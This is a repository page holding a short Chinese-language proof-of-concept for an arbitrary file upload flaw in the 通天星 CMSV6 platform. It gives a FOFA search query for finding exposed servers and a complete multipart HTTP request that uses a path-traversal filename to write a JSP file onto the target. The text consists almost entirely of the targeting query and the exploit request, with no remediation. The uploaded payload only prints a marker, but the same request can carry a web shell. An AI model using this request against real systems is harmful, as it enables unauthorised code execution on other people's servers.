admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md
wy876 4d11bd309d 525更新漏洞
2024-05-25 13:57:14 +08:00

29 lines
748 B
Markdown
Raw Blame History

## 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞
## fofa
```
body="./open/webApi.html"||body="/808gps/"
```
## poc
```
POST /inspect_file/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 226
Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b
--2e7688d712bcc913201f327059f9976b
Content-Disposition: form-data; name="uploadFile"; filename="../707140.jsp"
Content-Type: application/octet-stream
<% out.println("007319607"); %>
--2e7688d712bcc913201f327059f9976b--
```
![image-20240524224902984](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242249085.png)
Reference in New Issue View Git Blame Copy Permalink